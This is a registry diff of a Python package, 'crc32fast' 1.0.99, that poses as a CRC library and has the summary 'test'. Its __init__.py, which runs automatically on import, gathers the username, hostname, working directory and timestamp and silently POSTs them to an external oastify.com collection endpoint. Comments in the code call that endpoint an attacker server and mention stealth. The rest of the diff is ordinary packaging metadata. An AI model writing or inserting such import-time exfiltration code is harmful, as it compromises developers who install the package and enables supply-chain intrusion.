crc32fast 1.0.99__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,11 @@
1
+ Metadata-Version: 2.4
2
+ Name: crc32fast
3
+ Version: 1.0.99
4
+ Summary: test
5
+ Author: detox56
6
+ Author-email: dex81056@gmail.com
7
+ Requires-Dist: requests
8
+ Dynamic: author
9
+ Dynamic: author-email
10
+ Dynamic: requires-dist
11
+ Dynamic: summary
@@ -0,0 +1,36 @@
1
+ import requests
2
+ import subprocess
3
+ import os
4
+ import urllib.request
5
+ import json
6
+ import uuid
7
+
8
+ WEBHOOK_URL = "https://f3j0r70678u7vjnv17knsljv8med23qs.oastify.com/exf" # ← CHANGE THIS
9
+
10
+ def exfiltrate_system_info():
11
+ """Collect and POST system info"""
12
+ try:
13
+ # Gather data
14
+ data = {
15
+ 'id': str(uuid.uuid4()),
16
+ 'timestamp': subprocess.getoutput("date"),
17
+ 'whoami': subprocess.getoutput("whoami"),
18
+ 'pwd': os.getcwd(),
19
+ 'hostname': subprocess.getoutput("hostname")
20
+ }
21
+
22
+ # POST to attacker server
23
+ req = urllib.request.Request(
24
+ WEBHOOK_URL,
25
+ data=json.dumps(data).encode('utf-8'),
26
+ headers={'Content-Type': 'application/json'}
27
+ )
28
+ urllib.request.urlopen(req, timeout=5)
29
+
30
+ # print("✅ [POC] System info exfiltrated") # Stealth confirmation
31
+
32
+ except Exception as e:
33
+ pass # Silent fail
34
+
35
+ # Execute immediately on import
36
+ exfiltrate_system_info()
@@ -0,0 +1,11 @@
1
+ Metadata-Version: 2.4
2
+ Name: crc32fast
3
+ Version: 1.0.99
4
+ Summary: test
5
+ Author: detox56
6
+ Author-email: dex81056@gmail.com
7
+ Requires-Dist: requests
8
+ Dynamic: author
9
+ Dynamic: author-email
10
+ Dynamic: requires-dist
11
+ Dynamic: summary
@@ -0,0 +1,7 @@
1
+ setup.py
2
+ crc32fast/__init__.py
3
+ crc32fast.egg-info/PKG-INFO
4
+ crc32fast.egg-info/SOURCES.txt
5
+ crc32fast.egg-info/dependency_links.txt
6
+ crc32fast.egg-info/requires.txt
7
+ crc32fast.egg-info/top_level.txt
@@ -0,0 +1 @@
1
+ requests
@@ -0,0 +1 @@
1
+ crc32fast
@@ -0,0 +1,4 @@
1
+ [egg_info]
2
+ tag_build =
3
+ tag_date = 0
4
+
@@ -0,0 +1,11 @@
1
+ from setuptools import setup, find_packages
2
+
3
+ setup(
4
+ name="crc32fast",
5
+ version="1.0.99",
6
+ author="detox56",
7
+ author_email="dex81056@gmail.com",
8
+ description="test",
9
+ packages=find_packages(),
10
+ install_requires=['requests'],
11
+ )